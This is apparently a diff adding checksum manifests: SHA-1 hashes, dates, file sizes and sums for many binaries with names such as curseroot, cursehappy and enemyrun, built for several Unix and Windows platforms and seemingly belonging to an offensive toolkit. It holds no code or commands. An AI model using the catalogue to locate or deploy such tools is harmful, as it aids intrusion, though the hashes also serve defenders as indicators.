5DD669543CDF1C080324BE347E838C8EA9E5FE80 Fri Aug 6 14:28:56 2010 [PITCHIMPAIR.xx] cursenag.sunos5.8_v.1.0.0.1
|
||||||
|
D63912E862CAAC386EDF1581CC57D28DC88CBF00 Thu Jul 15 15:51:43 2010 [PITCHIMPAIR.xx] cursequake.sunos5.8_v.1.0.0.2
|
||||||
|
C45D7E21D425B5DFEEBB35F030101D0CE8102EFE Tue Jun 28 16:51:30 2011 [PITCHIMPAIR.xx] cursequake.sunos5.8_v.1.1.0.4
|
||||||
|
349885662B4C89A399DE5C5CC96BFFC394911E77 Thu Jan 20 19:51:40 2011 [PITCHIMPAIR.xx] curserazor.win2k_v.2.0.0.5
|
||||||
|
CE2AB103A224872A374EBD6AD16C0C63C2A82823 Thu Jan 20 19:51:40 2011 [PITCHIMPAIR.xx] curserazor.sunos5.8_v.2.0.0.5
|
||||||
|
BB8E43C87C436F886F515BCF1439CB214C6FC726 Tue Apr 12 13:41:50 2011 [PITCHIMPAIR.xx] curserazor.win2k_v.2.0.1.1
|
||||||
|
1F36611F0A9E1B9BCF9BDE6E983FBABE628D7F33 Tue Apr 12 13:41:50 2011 [PITCHIMPAIR.xx] curserazor.sunos5.8_v.2.0.1.1
|
||||||
|
B3370BB449078047FB7BB9B8425CDCC2A3015326 Fri Sep 21 17:18:54 2012 [PITCHIMPAIR.xx] curseroot_flx.hpux11.00.risc_v.1.1.0.3
|
||||||
|
7466C5ED2265CA3A9C20B400FB2F848BD45A5B09 Wed Jan 6 19:54:14 2010 [PITCHIMPAIR.xx] curseroot.hpuxb.11.00_v.2.0.0.3
|
||||||
|
7060A7B90CDEE01ED2EC5F2088FF3E280844DCE3 Thu Feb 18 21:01:21 2010 [PITCHIMPAIR.xx] cursetails.aix5.1_v.1.0.0.1
|
||||||
|
F7EA435175DEE6B6D9017120781FB5CB99CF5CD2 Thu Sep 18 16:43:33 2008 [PITCHIMPAIR.xx] cursetingle.aix.5.1_v.1.1.1.1
|
||||||
|
9B6399503D696C83D6EA4073321A20E84B354EAE Thu Aug 27 16:45:39 2009 [PITCHIMPAIR.xx] cursetingle.mswin32_v.2.0.0.1
|
||||||
|
DECFE5F18D8A50525A0C8A9F52503D35A213C267 Tue Jul 31 16:34:49 2012 [PITCHIMPAIR.xx] cursesalsa.hpux11.00.risc_v.1.0.0.1
|
||||||
|
EB36543FF084B04AEE005D848EE3A9568A6674CA Thu Aug 27 16:45:39 2009 [PITCHIMPAIR.xx] cursetingle.sunos5.8_v.2.0.0.1
|
||||||
|
08E4FF1E990A02810623A37796B9FB82D6655F25 Thu Aug 27 16:45:39 2009 [PITCHIMPAIR.xx] cursetingle.aix.5.1_v.2.0.0.1
|
||||||
|
275F529DC13CF184AB70B113F0FECA08D573CCFA Fri Jan 15 13:25:00 2010 [PITCHIMPAIR.xx] cursetingle.aix5.1_v.2.0.1.1
|
||||||
|
8ABAC3C15A23BA4DDCD52114F96B4BB740EFF6B3 Wed Jun 1 14:15:02 2011 [PITCHIMPAIR.xx] cursetingle_flx.aix5.1.powerpc_v.1.0.1.3
|
||||||
|
EC35453289E28A37E562113E9EFB582D125C5222 Thu Jan 21 15:39:40 2010 [PITCHIMPAIR.xx] cursetingle.2.0.1.2.mswin32_v.2.0.1.1
|
||||||
|
6C869E358F34014C1A3EC859C5281871BAE2BD4F Thu Jan 21 15:39:34 2010 [PITCHIMPAIR.xx] cursetingle.sunos5.8_v.2.0.1.1
|
||||||
|
41DC7887C46CCDEA6A771FF0201E29193754FCCF Thu Jul 10 13:14:23 2008 [PITCHIMPAIR.xx] cursetingle.sunos.5.9_v.1.0.0.7
|
||||||
|
D7F9D7433CB9E3F14C6640DE19DFCCD2CB6C295C Thu Jul 10 13:14:15 2008 [PITCHIMPAIR.xx] cursetingle.mswin32_v.1.0.0.7
|
||||||
|
EA087A035E3E01804E8E43C9DA8AB58C25A3038B Tue Mar 20 16:51:45 2012 [PITCHIMPAIR.xx] cursewham.linuxrh7.3.i686_v.1.1.0.1
|
||||||
|
E6D8C35163092B1235B6356214610361B6FBB7DC Tue Feb 28 16:41:16 2012 [PITCHIMPAIR.xx] cursewham.win2k.i686_v.1.1.0.1
|
||||||
|
427536C8C3BBC2B60217AD36F3BB7CE107810933 Thu Aug 11 12:53:41 2011 [PITCHIMPAIR.xx] cursewham.win2k.i686_v.1.0.0.3
|
||||||
|
A58C9E3E5B1AC639A6984D1CA271C568C2AFDCE3 Thu Apr 14 13:14:02 2011 [PITCHIMPAIR.xx] cursezinger_flx.win2k.i686_v.1.0.0.2
|
||||||
|
23D1A5F85A02ECDBF14FE77A7D9C256AE63A1053 Tue Jul 19 16:44:55 2011 [PITCHIMPAIR.xx] cursezinger.win2k_v.2.0.0.2
|
||||||
|
D01B0DBD4496AB9C47E64272AA01EC8AAFC6D84D Tue Jul 19 16:44:55 2011 [PITCHIMPAIR.xx] cursezinger.linuxrh7.3_v.2.0.0.2
|
||||||
|
52FA122317861F7B506BD42435E6A96F48C69514 Fri Jan 27 21:18:13 2012 [PITCHIMPAIR.xx] cursezinger.sunos5.8_v.2.0.0.2
|
||||||
|
8849F4B7B2DD9F106BB1499D9474E9BEE5FF3C64 Wed Jun 16 12:14:36 2010 [PITCHIMPAIR.xx] cursezinger.linuxrh7.3_v.1.0.0.1
|
||||||
|
BC7C9839441097E8D1DA64E9864D0474F2452572 Wed Jun 16 13:01:49 2010 [PITCHIMPAIR.xx] cursezinger.win2k_v.1.0.0.1
|
||||||
|
6E4C1302C79A610EBFA3B24BBAAFA67F438D865B Fri Sep 17 17:06:38 2010 [PITCHIMPAIR.xx] cursezinger.win2k_v.1.1.0.3
|
||||||
|
52432EFB738D4EE975D1064BFCB0E73195991C04 Fri Sep 17 17:06:38 2010 [PITCHIMPAIR.xx] cursezinger.linuxrh7.3_v.1.1.0.3
|
||||||
|
9A6B894B022E311F059EFB50DDB656CEF014DF64 Wed Oct 13 12:41:22 2010 [PITCHIMPAIR.xx] cursezinger.win2k_v.1.2.0.1
|
||||||
|
F6567080A506403DFA7399AA4EBCE64DD9DCDD52 Fri Oct 22 14:37:57 2010 [PITCHIMPAIR.xx] cursezinger.win2k_v.1.2.1.1
|
||||||
|
6BCA7BFF280DCB01D708286E376410C438B6F9B4 Fri Oct 22 14:37:57 2010 [PITCHIMPAIR.xx] cursezinger.linuxrh7.3_v.1.2.1.1
|
||||||
|
206FB9B0C4082713BF196ED46B9804ED396755F6 Mon Jul 23 14:19:24 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_editionhaze.def
|
||||||
|
CF097DD7F41B28BEF37872C3A365F06C745795F8 Mon Jul 23 14:21:07 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_silenttongues.def
|
||||||
|
6CD24B209838FB24E1C315B562BC20DE84E2AECE Mon Jul 23 14:20:57 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_sicklestar.def
|
||||||
|
94FB6A9E314411A8B7E218FE9D90024D7CD2F5BC Mon Jul 23 14:20:20 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_liquidsteel.def
|
||||||
|
F90BF1760240DE17E5FC071F1C3063A05E1DD520 Mon Jul 23 14:20:34 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_serenecosmos.def
|
||||||
|
0D7217C6F1F1A51D7D6FC0CA007256677C3190EF Mon Jul 23 14:21:25 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_wholeblue.def
|
||||||
|
787291960EA1A4A25FCB7CEC211CD6877F3FF283 Mon Jul 23 14:19:13 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_diamondaxe.def
|
||||||
|
2B1F44DB220DC26A58007DA88B0683952B40D520 Mon Jul 23 14:20:46 2007 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.1.0.6_solaris8_shakengiraffe.def
|
||||||
|
A08866353BC5953B6346F07E0607E4B93504098D Mon Nov 27 20:44:15 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_editionhaze.def
|
||||||
|
258C7D06A42F22F0D2855DB2EE499C5B44BB412B Mon Nov 27 20:45:30 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_silenttongues.def
|
||||||
|
EEF893ED6057D23F410EF37B82F4F7B9478BBDC3 Mon Nov 27 20:45:22 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_sicklestar.def
|
||||||
|
63DE1E981DB1317838756EBCDDAC8483AAF93AFE Mon Nov 27 20:44:41 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_liquidsteel.def
|
||||||
|
42BE054AE4D7EBEB277254A95272B261F0361227 Mon Nov 27 20:45:02 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_serenecosmos.def
|
||||||
|
50D7874B6856A3E89C31CCFE8CBBD02E0FD5E345 Mon Nov 27 20:45:38 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_wholeblue.def
|
||||||
|
0222399D32F29B0539FCDA4FC2122953CED91F95 Mon Nov 27 20:45:14 2006 [PITCHIMPAIR.xx] cursehappy-solaris_v.4.0_shakengiraffe.def
|
||||||
|
0564E3F02B58EA50F9E37AD41ED8894484A2D0BA Thu Apr 12 11:59:40 2012 [PITCHIMPAIR.xx] curseclash.v1.0.0.3.aix5.1.powerpc_v.superceded
|
||||||
|
C8C5F054286140C25FC96F82F099D76D67E136ED Thu Jul 22 13:03:48 2010 [PITCHIMPAIR.xx] cursetingle_flx.v1.0.0.9.aix5.1.powerpc_v.superceded
|
||||||
|
8CA41956ED63025C8760F3EBD4B704F7C7CB7F70 Wed Jan 2 21:36:42 2008 [PITCHIMPAIR.xx] cursehappy.v4.1.2.4.sunos5.8_v.4.1.2.4_solaris8
|
||||||
|
D5A0ED87A0E5029AA0A8568EFD2F8ACFEFC0DC2E Fri Dec 11 14:04:25 2009 [PITCHIMPAIR.xx] curseroot.aix5.1_v.2.0.0.3.00000
|
||||||
|
7992D84590400AEA7ACCC172402AC497889A4491 Fri Dec 11 14:04:25 2009 [PITCHIMPAIR.xx] curseroot.win2k_v.2.0.0.3.00000
|
||||||
|
BD253FF1DB61808424630608C610E4C7B8A6CC01 Mon Mar 19 12:22:58 2012 [PITCHIMPAIR.xx] curseroot.aix5.1.powerpc_v.2.2.0.7.00001
|
||||||
|
3D7B80D8003A10D08ECA4FFDD595F105FAB50FA3 Wed Mar 28 11:54:51 2012 [PITCHIMPAIR.xx] curseroot.hpux11.00.risc_v.2.2.0.7.00001
|
||||||
|
253E0E246633E603E58DAB97E1D4782FB7DDDA84 Fri Mar 23 11:43:49 2012 [PITCHIMPAIR.xx] curseroot.win2k.i686_v.2.2.0.7.00001
|
||||||
|
8D8996D5B82BC9AAA0310B982FD048FB77644107 Wed Mar 28 11:54:59 2012 [PITCHIMPAIR.xx] curseroot.linux2.6.5-7.97-smp.i686_v.2.2.0.7.00000
|
||||||
|
D114B8EC196B7DEFEEE751CE73932B6F952178BE Wed Mar 28 11:55:10 2012 [PITCHIMPAIR.xx] curseroot.sunos5.8.sparc_v.2.2.0.7.00000
|
||||||
|
201F963039FDED3AA70DE84AF5DCCF47541C14DF Fri Dec 11 14:04:26 2009 [PITCHIMPAIR.xx] curseroot.linux2.6.5-7.97-smp_v.2.0.0.3.00000
|
||||||
|
F992E901527ECEE524CDA9BA5F0C8F70942DB4CB Fri Dec 11 14:04:26 2009 [PITCHIMPAIR.xx] curseroot.sunos5.8_v.2.0.0.3.00000
|
||||||
|
99FDFEC3A7987E0AC44A70A1E151B0D7CF255F93 Mon Feb 13 12:47:09 2012 [PITCHIMPAIR.xx] enemyrun.sunos5.8_v.4.0.0.5
|
||||||
|
7120D410762BEFC7C52320DD3EADC6E9F9572B48 Mon Feb 13 12:47:09 2012 [PITCHIMPAIR.xx] enemyrun.hpux11.00_v.4.0.0.5
|
||||||
|
BA230F9E0CDB877EFEB4D0FA607E60E249852D42 Mon Feb 13 12:47:09 2012 [PITCHIMPAIR.xx] enemyrun.linuxrhe3.6_v.4.0.0.5
|
||||||
|
6ED9AEE28FF29FC7662E917966E8DACA88684FBB Mon Feb 13 12:47:09 2012 [PITCHIMPAIR.xx] enemyrun.sunos5.8.i386_v.4.0.0.5
|
||||||
|
0992DC598EC7BD5F9AEA57B27FD9C768189CC727 Mon Feb 13 12:47:09 2012 [PITCHIMPAIR.xx] enemyrun.linuxrh7.3_v.4.0.0.5
|
||||||
|
7E002B46EE7384D3BE2CDF6DAAD6CD3930622042 Wed Aug 8 13:59:20 2012 [PITCHIMPAIR.xx] enemyrun.hpux11.00_v.4.0.1.2
|
||||||
|
46AB7FF7485F9EB12926303DFF123F6239D007F2 Wed Aug 8 13:59:20 2012 [PITCHIMPAIR.xx] enemyrun.linuxrhe3.6_v.4.0.1.2
|
||||||
|
0E41BE4D91401CA3D89A2C73147DC4EC07F00464 Wed Aug 8 13:59:20 2012 [PITCHIMPAIR.xx] enemyrun.sunos5.8.i386_v.4.0.1.2
|
||||||
|
FE628F79D61434F1D5009A63FD9791ED6067ECCD Wed Aug 8 13:59:20 2012 [PITCHIMPAIR.xx] enemyrun.linuxrh7.3_v.4.0.1.2
|
||||||
|
5B361CEBDE1081B9512144EBD9E2A8B5E0C9EE7E Wed Aug 8 13:59:20 2012 [PITCHIMPAIR.xx] enemyrun.sunos5.8_v.4.0.1.2
|
||||||
|
E0D3C2B414F88E9A82D2A20E5BF530999DF1685B Mon Jul 26 12:51:48 2010 [PITCHIMPAIR.xx] skimcountry.sunos5.8_v.2.0.0.3
|
||||||
|
C6B0D0D7DE22D73BA10D489F54DEEEBA1F160667 Mon Jul 26 12:51:48 2010 [PITCHIMPAIR.xx] skimcountry.aix5.1_v.2.0.0.3
|
||||||
|
410E467CC96BDCF8A0382BB08D6128282893A6D9 Fri Oct 22 15:49:31 2010 [PITCHIMPAIR.xx] skimcountry__flx.aix5.1.powerpc_v.1.0.0.4
|
||||||
|
760F723A7DA566B4D850AAD691136BCA0E964C91 Mon Jun 6 18:04:22 2011 [PITCHIMPAIR.xx] skimcountry__flx.aix5.1.powerpc_v.1.0.1.1
|
||||||
|
D2BF3E02231A43E1C23EB6953D1225E3759417B2 Fri Apr 5 20:50:33 2013 [PITCHIMPAIR.xx] store-linux-i386_v.3.1.1.2
|
||||||
|
CD30BDFE72B6637BFF56054BD5DC28688DEEAEF5 Fri Apr 5 20:50:33 2013 [PITCHIMPAIR.xx] watcher-linux-i386_v.3.1.1.2
|
||||||
|
A5DD19C52F4D0EFE23258E7D0121572560A91226 Fri Apr 5 20:50:33 2013 [PITCHIMPAIR.xx] watcher-linux-x86_64_v.3.1.1.2
|
||||||
|
75CC2105A7D388E43A8A8EE8F272B5582A10CED5 Fri Apr 5 20:50:33 2013 [PITCHIMPAIR.xx] watcher-solaris-sparc_v.3.1.1.2
|
||||||
|
A4606FDC49500410A98A8DA669D581A74C59CEBA Fri Apr 5 20:50:33 2013 [PITCHIMPAIR.xx] watcher-solaris-i386_v.3.1.1.2
|
||||||
|
F164DAA27C131789A26E9C593C49EC22329D87CD Thu Jun 6 20:50:25 2013 [PITCHIMPAIR.xx] store-linux-i386_v.3.2.0.1
|
||||||
|
7931C34D569CBB5BCDB197601A6185F762F6A597 Thu Jun 6 20:50:25 2013 [PITCHIMPAIR.xx] watcher-linux-i386_v.3.2.0.1
|
||||||
|
E889F35D95B17FAEA273BE16AD3F0DC1AECE92F9 Thu Jun 6 20:50:25 2013 [PITCHIMPAIR.xx] watcher-linux-x86_64_v.3.2.0.1
|
||||||
|
40C35E6CAE4CB2414BBE4B4F631683A8EFF9427B Thu Jun 6 20:50:25 2013 [PITCHIMPAIR.xx] watcher-solaris-sparc_v.3.2.0.1
|
||||||
|
AB1B72AC2A08724E8702047555C51620E23CCBAF Thu Jun 6 20:50:26 2013 [PITCHIMPAIR.xx] watcher-solaris-i386_v.3.2.0.1
|
||||||
|
5CF7686B1BD84675D7530B6CD627538C6B56F145 Thu Sep 12 15:58:02 2013 [PITCHIMPAIR.xx] store-linux-i386_v.3.3.0.1
|
||||||
|
93512B5BBD3F5079187F0BEF17CAA378758A5CBD Thu Sep 12 15:58:02 2013 [PITCHIMPAIR.xx] watcher-linux-i386_v.3.3.0.1
|
||||||
|
CE3CC68E01FBA2D30D13406324B87C125E4C80CE Thu Sep 12 15:58:02 2013 [PITCHIMPAIR.xx] watcher-linux-x86_64_v.3.3.0.1
|
||||||
|
A3A5062CB14A7212C6417BAFED8366B13F4DA005 Thu Sep 12 15:58:02 2013 [PITCHIMPAIR.xx] watcher-solaris-sparc_v.3.3.0.1
|
||||||
|
61AE7B67D32E7662250ED1C81C296D6C06A2702B Thu Sep 12 15:58:02 2013 [PITCHIMPAIR.xx] watcher-solaris-i386_v.3.3.0.1
|
166
archive_files/charm/tools.sums.txt
Normal file
166
archive_files/charm/tools.sums.txt
Normal file
|
@ -0,0 +1,166 @@
|
||||||
|
# FILE SIZE cksum sum solarissum
|
||||||
|
charm_hammer.linuxrh7.3.i686_v.1.0.0.3 133776 2112957847 37260 46614
|
||||||
|
charm_penguin.sunos5.8_v.2.0.1.4 140388 2381583960 15166 50862
|
||||||
|
charm_razor.win2k_v.2.0.0.1 128000 1451219500 24792 37268
|
||||||
|
charm_razor.linux2.6.5-7.97-smp.i686_v.2.1.0.2 149160 2517413002 11127 39535
|
||||||
|
charm_saver.hpux11.00_v.2.0.0.2 135168 2809723314 33326 33264
|
||||||
|
charm_saver.win2k_v.2.0.0.2 129024 4072671704 43512 9330
|
||||||
|
crypttool.sunos5.8.sparc_v.2.0.1.3 103752 2298364610 45700 50799
|
||||||
|
crypttool.linux2.4.18-3_v.2.0.1.3 75628 3045942630 25490 52712
|
||||||
|
crypttool.sunos5.8.i386_v.2.0.1.3 116496 910318730 48259 1425
|
||||||
|
crypttool.win2k_v.2.0.1.3 100352 3256855359 19983 12213
|
||||||
|
crypttool.hpuxb.11.00_v.2.0.1.3 126976 1116022089 17484 16599
|
||||||
|
crypttool.aix5.1_v.2.0.1.3 111281 66028508 58618 45955
|
||||||
|
crypttool.sunos5.8.sparc_v.2.1.0.2 143972 317161976 64363 29575
|
||||||
|
crypttool.linux2.4.18-3_v.2.1.0.2 99628 248651161 20216 28548
|
||||||
|
crypttool.sunos5.8.i386_v.2.1.0.2 141488 2728244747 28365 57852
|
||||||
|
crypttool.win2k_v.2.1.0.2 128512 3143510205 50682 36598
|
||||||
|
crypttool.hpuxb.11.00_v.2.1.0.2 151552 2602907135 58110 1617
|
||||||
|
crypttool.aix5.1_v.2.1.0.2 148961 3152687348 64177 18932
|
||||||
|
cursebongo.sunos5.8_v.2.0.0.1 139348 3981776761 62992 62647
|
||||||
|
curseclash.aix5.1.powerpc_v.1.0.1.1 189204 1247555263 03253 9434
|
||||||
|
curseclash_flx.sunos5.8.sparc_v.1.0.0.3 268404 3549940038 43413 38925
|
||||||
|
curseclash_flx.aix5.1.powerpc_v.1.0.0.3 338539 3544150145 42455 49546
|
||||||
|
cursedevo.sunos5.8_v.1.0.0.3 149932 3585726772 28443 50325
|
||||||
|
cursefire.linuxrh7.3.i686_v.1.1.0.2 154544 1039750187 59895 54814
|
||||||
|
cursefire.sunos5.8.sparc_v.1.0.0.3 158600 2558715541 41015 33900
|
||||||
|
curseflower.mswin32_v.1.0.0.3 90112 1985062419 18896 47647
|
||||||
|
cursegismo.sunos5.8.sparc_v.2.2.0.2 201916 1968491981 55322 4496
|
||||||
|
cursegismo.sunos5.8.i386_v.2.2.0.2 193260 824071257 32241 38052
|
||||||
|
cursegismo.linuxrh7.3.i686_v.2.2.0.2 148776 3858703513 43819 49461
|
||||||
|
cursegismo.linuxrh7.3_v.2.0.0.2 121624 3039175349 38874 23207
|
||||||
|
cursegismo.sunos5.8_v.2.0.0.2 166508 3650214234 13976 40359
|
||||||
|
cursegismo.hpuxb.11.00_v.2.0.0.2 151552 2404513618 64926 21918
|
||||||
|
cursegismo.sunos5.8.i386_v.2.1.0.1 160936 3497525570 10444 5600
|
||||||
|
cursegismo.linuxrh7.3_v.2.1.0.1 121548 3715354245 20944 37150
|
||||||
|
cursegismo.sunos5.8_v.2.1.0.1 172596 2401859147 26922 52333
|
||||||
|
cursegismo.hpux11.00_v.2.1.0.1 155648 1048643453 28701 2274
|
||||||
|
cursegismo.sunos5.8.i386_v.2.0.0.5 155060 1476936287 40325 51145
|
||||||
|
cursehappy.win2k_v.6.0.0.1 80896 902732025 34814 8351
|
||||||
|
cursehappy.rhl7.3_v.6.0.0.1 118872 3335983393 64569 52778
|
||||||
|
cursehappy.hp-uxb.11.00_v.6.0.0.1 151552 3404938804 10577 57918
|
||||||
|
cursehappy.sunos5.8_v.6.0.0.1 152252 3035988714 25161 22509
|
||||||
|
cursehappy.sunos5.8_v.6.1.0.1 161564 4281879084 25472 34846
|
||||||
|
cursehappy.hpux11.00_v.6.1.0.1 159744 1992944929 44034 28301
|
||||||
|
cursehappy.win2k_v.6.1.0.1 150528 1910129873 23158 58895
|
||||||
|
cursehappy.linuxrh7.3_v.6.1.0.1 123184 2161229410 48141 9448
|
||||||
|
cursehappy.linuxrh7.3.unknown_v.6.2.0.3 155836 1950211397 07726 51556
|
||||||
|
cursehappy.hpux11.00.risc_v.6.2.0.3 176128 3806395765 02724 44677
|
||||||
|
cursehappy.win2k.i686_v.6.2.0.3 170496 1183909897 02339 3052
|
||||||
|
cursehappy.sunos5.8.sparc_v.6.2.0.3 180936 51457078 37748 44755
|
||||||
|
cursehelper.win2k_v.2.1.0.2 142336 933130206 24878 64656
|
||||||
|
cursehelper.sunos5.8_v.2.1.0.2 152004 3750919642 34972 55494
|
||||||
|
cursehelper.hpux11.00_v.2.1.0.2 147456 481961459 06585 60105
|
||||||
|
cursehelper.aix5.1_v.2.1.0.2 191061 973745972 00104 51956
|
||||||
|
cursehelper.win2k.i686_v.2.2.0.4 162816 2787389769 05516 6932
|
||||||
|
cursehelper.sunos5.8.sparc_v.2.2.0.4 190188 2633929931 02930 36911
|
||||||
|
cursehelper.aix5.1.powerpc_v.2.2.0.4 193597 4012475820 56804 59547
|
||||||
|
cursehelper.hpux11.00.risc_v.2.2.0.4 208896 800678791 45188 11595
|
||||||
|
cursehelper.linuxrh7.3.i686_v.2.2.1.1 175868 475785651 46886 24066
|
||||||
|
cursehelper.sunos5.8.i386_v.2.2.0.4 195336 1988946024 45737 41283
|
||||||
|
cursehole_flx.aix5.1.powerpc_v.1.0.0.4 377371 2681554099 37509 63719
|
||||||
|
cursehole_flx.sunos5.8.sparc_v.1.0.0.3 299096 4141793404 37558 55633
|
||||||
|
cursekettle.hpux11.00.risc_v.1.1.0.2 176128 2364719211 16877 26818
|
||||||
|
cursekiln.sunos5.8_v.1.0.0.2 176404 2350204552 27241 29410
|
||||||
|
cursekiln.sunos5.8_v.1.0.1.3 176692 4029566111 43116 8599
|
||||||
|
cursemagic.linuxrh7.3_v.2.0.0.1 113432 167693029 55807 14486
|
||||||
|
cursemagic.solaris5.8_v.2.0.0.1 140624 1690841195 12267 19685
|
||||||
|
cursemagic.solaris5.8_v.2.0.1.1 140248 1248938891 58383 16679
|
||||||
|
cursemagic.linuxrh7.3_v.2.0.1.1 113432 3153799582 01885 22339
|
||||||
|
cursemagic.hpux11.00_v.2.0.1.1 139264 1919573794 54402 9001
|
||||||
|
cursemagic.aix5.1_v.2.0.1.1 198300 2876776973 04202 14685
|
||||||
|
cursemagic.aix5.1_v.2.1.0.3 224264 2892482690 20212 56702
|
||||||
|
cursemagic.linuxrh7.3_v.2.1.0.3 146812 3739978016 60850 60509
|
||||||
|
cursemagic.sunos5.8_v.2.1.0.3 167836 598611910 30306 20384
|
||||||
|
cursemagic.hpux11.00_v.2.1.0.3 163840 2684793360 63580 63601
|
||||||
|
cursenag.sunos5.8_v.1.0.0.1 148824 4216236752 48499 25454
|
||||||
|
cursequake.sunos5.8_v.1.0.0.2 138728 2219816470 53554 24668
|
||||||
|
cursequake.sunos5.8_v.1.1.0.4 151108 706987852 08863 21242
|
||||||
|
curserazor.win2k_v.2.0.0.5 142336 3614550981 32141 38186
|
||||||
|
curserazor.sunos5.8_v.2.0.0.5 151712 266392035 36062 20560
|
||||||
|
curserazor.win2k_v.2.0.1.1 145920 3665025734 52447 19736
|
||||||
|
curserazor.sunos5.8_v.2.0.1.1 156956 2913942188 43306 37613
|
||||||
|
curseroot_flx.hpux11.00.risc_v.1.1.0.3 294912 1121890451 23116 52861
|
||||||
|
curseroot.hpuxb.11.00_v.2.0.0.3 143360 3733355325 60984 39977
|
||||||
|
cursetails.aix5.1_v.1.0.0.1 180276 4044734128 31290 58204
|
||||||
|
cursetingle.aix.5.1_v.1.1.1.1 99925 2516963645 50006 1948
|
||||||
|
cursetingle.mswin32_v.2.0.0.1 98304 3746339119 48113 52565
|
||||||
|
cursesalsa.hpux11.00.risc_v.1.0.0.1 180224 3477337387 60490 57830
|
||||||
|
cursetingle.sunos5.8_v.2.0.0.1 137132 1479052110 35756 44597
|
||||||
|
cursetingle.aix.5.1_v.2.0.0.1 180813 2891705692 59684 10363
|
||||||
|
cursetingle.aix5.1_v.2.0.1.1 184593 3105856638 26898 26451
|
||||||
|
cursetingle_flx.aix5.1.powerpc_v.1.0.1.3 259141 2828128604 39262 42960
|
||||||
|
cursetingle.2.0.1.2.mswin32_v.2.0.1.1 98304 1876770440 20050 12575
|
||||||
|
cursetingle.sunos5.8_v.2.0.1.1 142392 3826035928 56373 14520
|
||||||
|
cursetingle.sunos.5.9_v.1.0.0.7 55444 986565815 56621 50199
|
||||||
|
cursetingle.mswin32_v.1.0.0.7 81920 467686355 09311 12178
|
||||||
|
cursewham.linuxrh7.3.i686_v.1.1.0.1 129648 4052230338 51775 33743
|
||||||
|
cursewham.win2k.i686_v.1.1.0.1 136192 2405279675 50768 26522
|
||||||
|
cursewham.win2k.i686_v.1.0.0.3 135168 3859843989 24516 31571
|
||||||
|
cursezinger_flx.win2k.i686_v.1.0.0.2 262656 3131462353 37427 20791
|
||||||
|
cursezinger.win2k_v.2.0.0.2 155648 1139756440 63461 7620
|
||||||
|
cursezinger.linuxrh7.3_v.2.0.0.2 146512 23087955 55272 41261
|
||||||
|
cursezinger.sunos5.8_v.2.0.0.2 167028 845090707 25277 38441
|
||||||
|
cursezinger.linuxrh7.3_v.1.0.0.1 125880 4253402431 45933 16844
|
||||||
|
cursezinger.win2k_v.1.0.0.1 139264 2191543083 27871 51316
|
||||||
|
cursezinger.win2k_v.1.1.0.3 138240 2382619163 09901 381
|
||||||
|
cursezinger.linuxrh7.3_v.1.1.0.3 117272 756885449 58885 62504
|
||||||
|
cursezinger.win2k_v.1.2.0.1 142336 545843415 57530 59663
|
||||||
|
cursezinger.win2k_v.1.2.1.1 142848 2300782138 03792 58131
|
||||||
|
cursezinger.linuxrh7.3_v.1.2.1.1 117272 991474873 07665 52134
|
||||||
|
cursehappy-solaris_v.4.1.0.6_solaris8_editionhaze.def 9648 4150856398 30645 42331
|
||||||
|
cursehappy-solaris_v.4.1.0.6_solaris8_silenttongues.def 11066 541471505 51498 11544
|
||||||
|
cursehappy-solaris_v.4.1.0.6_solaris8_sicklestar.def 9913 3129343639 42448 54071
|
||||||
|
cursehappy-solaris_v.4.1.0.6_solaris8_liquidsteel.def 12013 1012649203 34433 20418
|
||||||
|
cursehappy-solaris_v.4.1.0.6_solaris8_serenecosmos.def 10987 1452568790 21762 9285
|
||||||
|
cursehappy-solaris_v.4.1.0.6_solaris8_wholeblue.def 12803 1967258321 13344 13734
|
||||||
|
cursehappy-solaris_v.4.1.0.6_solaris8_diamondaxe.def 11274 585588577 60600 27086
|
||||||
|
cursehappy-solaris_v.4.1.0.6_solaris8_shakengiraffe.def 16983 826384167 39992 49863
|
||||||
|
cursehappy-solaris_v.4.0_editionhaze.def 10434 3554712859 32534 37466
|
||||||
|
cursehappy-solaris_v.4.0_silenttongues.def 12144 264840104 54467 29109
|
||||||
|
cursehappy-solaris_v.4.0_sicklestar.def 10205 3173803460 28487 10738
|
||||||
|
cursehappy-solaris_v.4.0_liquidsteel.def 13829 840044669 02409 30364
|
||||||
|
cursehappy-solaris_v.4.0_serenecosmos.def 12250 4094378744 49051 42334
|
||||||
|
cursehappy-solaris_v.4.0_wholeblue.def 15088 1685878040 36262 59942
|
||||||
|
cursehappy-solaris_v.4.0_shakengiraffe.def 19604 1586877344 42208 57145
|
||||||
|
curseclash.v1.0.0.3.aix5.1.powerpc_v.superceded 189316 1333771125 32532 22177
|
||||||
|
cursetingle_flx.v1.0.0.9.aix5.1.powerpc_v.superceded 251489 776515953 47413 27090
|
||||||
|
cursehappy.v4.1.2.4.sunos5.8_v.4.1.2.4_solaris8 1523256 2933352913 27477 59239
|
||||||
|
curseroot.aix5.1_v.2.0.0.3.00000 206940 4220672519 01458 41704
|
||||||
|
curseroot.win2k_v.2.0.0.3.00000 83968 3199238746 00188 16711
|
||||||
|
curseroot.aix5.1.powerpc_v.2.2.0.7.00001 186520 4003638340 58818 34225
|
||||||
|
curseroot.hpux11.00.risc_v.2.2.0.7.00001 200704 2946922064 06310 57635
|
||||||
|
curseroot.win2k.i686_v.2.2.0.7.00001 157184 669967646 13502 29530
|
||||||
|
curseroot.linux2.6.5-7.97-smp.i686_v.2.2.0.7.00000 156708 2625294666 57226 32834
|
||||||
|
curseroot.sunos5.8.sparc_v.2.2.0.7.00000 180296 3651556126 24857 35687
|
||||||
|
curseroot.linux2.6.5-7.97-smp_v.2.0.0.3.00000 139368 2738524079 30084 17788
|
||||||
|
